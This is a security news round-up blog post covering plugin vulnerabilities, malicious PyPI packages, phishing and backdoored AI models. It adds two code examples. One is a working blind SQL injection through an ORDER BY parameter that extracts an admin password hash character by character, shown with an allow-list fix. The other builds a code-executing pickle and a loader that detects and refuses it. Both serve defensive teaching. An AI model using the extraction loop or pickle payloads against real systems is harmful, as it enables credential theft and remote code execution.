Security news weekly round-up - 1st March 2024

Habdul Hazeez - Mar 1 - Dev Community

Introduction

Hello there. In this week's review, we'll cover social media, WordPress plugin vulnerabilities, malicious PyPI packages, phishing, and a backdoored AI model.


10 things to avoid posting on social media – and why

If you read the article's title and thought "I know that already", think again. Stop whatever you're doing now and read the article.

The following should get you started:

It might sound pretty innocuous to post a pic or an update saying you’re excited about an upcoming holiday. But it could signify to someone monitoring your account that your property will be left unattended during that time.

WordPress LiteSpeed Plugin Vulnerability Puts 5 Million Sites at Risk

It is scary, but luckily it was patched in LiteSpeed Cache version 5.7.0.1. So, if you are running an older version, update it immediately.

Here is why:

This plugin suffers from an unauthenticated site-wide stored [cross-site scripting] vulnerability and could allow any unauthenticated user to do anything from stealing sensitive information to, in this case, privilege escalation on the WordPress site by performing a single HTTP request.

WordPress Plugin Alert - Critical SQLi Vulnerability Threatens 200K+ Websites

It's a plugin called Ultimate Member, and if you have a version earlier than 2.8.3, update it immediately. Stay safe and read more below 👇

The plugin is "vulnerable to SQL Injection via the 'sorting' parameter in versions 2.1.3 to 2.8.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query."
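The flaw class the advisory describes, a sort key spliced into ORDER BY with no escaping and no prepared statement, as an added example that is not the plugin's code: the schema, rows, handler names and the extraction loop are all constructed for illustration. It goes one step beyond the advisory by showing how such an injection becomes a yes/no oracle that leaks a secret one character per request, and why the fix for a sort column is an allow-list rather than a placeholder, since `?` cannot bind an identifier.

```python
import sqlite3
import string


def make_db() -> sqlite3.Connection:
    """Constructed sample schema, not the plugin's real tables: a member
    directory that a page sorts, plus a users table holding a secret."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE members (id INTEGER PRIMARY KEY, display_name TEXT, registered TEXT);
        CREATE TABLE wp_users (id INTEGER PRIMARY KEY, user_login TEXT, user_pass TEXT);
        INSERT INTO members VALUES (1, 'zed', '2024-01-01'),
                                   (2, 'amy', '2024-02-01'),
                                   (3, 'mia', '2024-03-01');
        INSERT INTO wp_users VALUES (1, 'admin', '$P$BexampleHash');
        """
    )
    return conn


def list_members_vulnerable(conn: sqlite3.Connection, sorting: str) -> list[str]:
    """Hypothetical vulnerable handler: the request's sort key is interpolated
    straight into ORDER BY, which is the flaw class the advisory describes."""
    sql = f"SELECT display_name FROM members ORDER BY {sorting}"
    return [row[0] for row in conn.execute(sql)]


# A '?' placeholder cannot bind a column name, so every accepted sort key is
# mapped to a fixed SQL fragment and anything else is rejected outright.
ALLOWED_SORTS = {
    "display_name": "display_name ASC",
    "newest": "registered DESC",
    "oldest": "registered ASC",
}


def list_members_safe(conn: sqlite3.Connection, sorting: str) -> list[str]:
    """Hardened handler: the user value only selects an allow-listed fragment."""
    order = ALLOWED_SORTS.get(sorting)
    if order is None:
        raise ValueError(f"unsupported sort key: {sorting!r}")
    sql = f"SELECT display_name FROM members ORDER BY {order}"
    return [row[0] for row in conn.execute(sql)]


def boolean_oracle(conn: sqlite3.Connection, condition_sql: str) -> bool:
    """Turn the ORDER BY injection into a yes/no question: the CASE sorts by id
    when the attacker's condition holds and by name otherwise, so the row order
    in the response leaks one bit per request."""
    payload = f"(CASE WHEN ({condition_sql}) THEN id ELSE display_name END)"
    by_id = [row[0] for row in conn.execute("SELECT display_name FROM members ORDER BY id")]
    return list_members_vulnerable(conn, payload) == by_id


def extract_secret(conn: sqlite3.Connection, max_len: int = 40) -> str:
    """Blind, boolean-based extraction: recover the admin's password hash one
    character at a time by asking the oracle about each position."""
    alphabet = string.ascii_letters + string.digits + "$./"
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            condition = (
                f"(SELECT substr(user_pass, {pos}, 1) FROM wp_users "
                f"WHERE user_login = 'admin') = '{ch}'"
            )
            if boolean_oracle(conn, condition):
                recovered += ch
                break
        else:
            break  # no candidate matched, so the string has ended
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("leaked through ORDER BY:", extract_secret(db))
    try:
        list_members_safe(db, "(CASE WHEN 1=1 THEN id ELSE display_name END)")
    except ValueError as exc:
        print("hardened handler:", exc)
```

The point to take away is that "sufficient preparation" for a sort parameter cannot mean a bound parameter: the column name must come from the application, never from the request.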

Japan warns of malicious PyPi packages created by North Korean hackers

The good news from this article: the packages have been taken offline. The bad news: thousands had downloaded them before that happened. It's not good 😞.

Here is why:

The Japanese cybersecurity agency says that the final payload (IconCache.db), executed in memory, is a malware known as "Comebacker," first identified by Google analysts in January 2021, who reported that it was used against security researchers.

The Comebacker malware connects to the attacker's command and control (C2) server, sends an HTTP POST request with encoded strings, and waits for further Windows malware to be loaded in memory.

New Phishing Kit Leverages SMS, Voice Calls to Target Cryptocurrency Users

Attackers will do anything to get your money, and this article proves it. Watch out and stay safe.

More for you:

Targets of the phishing kit include employees of the Federal Communications Commission (FCC), Binance, Coinbase, and cryptocurrency users of various platforms like Binance, Coinbase, Gemini, Kraken, ShakePay, Caleb & Brown, and Trezor. More than 100 victims have been successfully phished to date.

Hugging Face, the GitHub of AI, hosted code that backdoored user devices

No system is safe.

Here is an excerpt from the article:

One model drew particular concern because it opened a reverse shell that gave a remote device on the Internet full control of the end user’s device. When JFrog researchers loaded the model into a lab machine, the submission indeed loaded a reverse shell but took no further action.
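The models in the JFrog report were pickle-serialized PyTorch files, and a pickle can instruct the loader to import and call any Python callable while it is being loaded; that is how a "model" opens a reverse shell the moment it is deserialized. As an added example, not code from the article or from JFrog, with all data constructed (the malicious bytes call the harmless os.getcwd in place of a shell-spawning function): a loader that lists the globals a pickle references without executing it, then refuses to load anything whose globals are not on an allow-list.

```python
import io
import os
import pickle
import pickletools
from collections import OrderedDict

# Constructed: a hand-written protocol-0 pickle doing what a malicious
# __reduce__ emits. 'c' (GLOBAL) imports os.getcwd, ')' pushes an empty
# argument tuple, 'R' (REDUCE) calls it, '.' stops. A real backdoor would
# import a shell-spawning callable in place of the harmless os.getcwd.
MALICIOUS_PICKLE = b"cos\ngetcwd\n)R."

# Constructed benign "weights": plain containers only, no globals at all.
BENIGN_PICKLE = pickle.dumps({"layer1.weight": [0.1, 0.2], "layer1.bias": [0.0]})

# Constructed benign checkpoint that does reference a global, as real
# PyTorch state dicts do, so an opcode scan alone cannot be the decision.
ORDERED_PICKLE = pickle.dumps(OrderedDict([("layer1.weight", [0.1, 0.2])]))


def naive_load(data: bytes):
    """What a trusting loader does: pickle.loads runs whatever the stream asks
    for, so loading MALICIOUS_PICKLE returns the result of calling os.getcwd()."""
    return pickle.loads(data)


def demo_naive_load_runs_code() -> bool:
    """True if the naive loader really executed the embedded call."""
    return naive_load(MALICIOUS_PICKLE) == os.getcwd()


def referenced_globals(data: bytes) -> list[str]:
    """Static triage: walk the opcode stream with pickletools, never executing
    it, and list every module.name the pickle wants to import."""
    found: list[str] = []
    recent_strings: list[str] = []  # STACK_GLOBAL takes module and name from the stack
    for op, arg, _pos in pickletools.genops(data):
        if op.name == "GLOBAL":
            found.append(arg.replace(" ", "."))  # genops yields "module name"
        elif op.name == "STACK_GLOBAL":
            found.append(".".join(recent_strings[-2:]))
        if isinstance(arg, str):
            recent_strings.append(arg)
    return found


class RestrictedUnpickler(pickle.Unpickler):
    """The actual gate: only allow-listed globals may be resolved, so an
    unexpected import fails before any call can happen."""

    ALLOWED = {("collections", "OrderedDict")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is not allow-listed")


def load_untrusted(data: bytes):
    """Returns (True, object) for an accepted pickle, (False, reason) otherwise."""
    try:
        obj = RestrictedUnpickler(io.BytesIO(data)).load()
    except pickle.UnpicklingError as exc:
        return False, f"refused: {exc}; globals referenced: {referenced_globals(data)}"
    return True, obj


if __name__ == "__main__":
    for label, blob in [("malicious", MALICIOUS_PICKLE), ("benign", BENIGN_PICKLE),
                        ("ordered", ORDERED_PICKLE)]:
        print(label, referenced_globals(blob), load_untrusted(blob))
```

The opcode listing is useful for triage (a checkpoint that references `os`, `subprocess` or `builtins.eval` is an immediate red flag), but real checkpoints legitimately reference globals, so the allow-listed `find_class` is the control that actually decides. Where a format choice is available, weights in a non-executable format such as safetensors remove the problem entirely.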

Credits

Cover photo by Debby Hudson on Unsplash.


That's it for this week, and I'll see you next time.
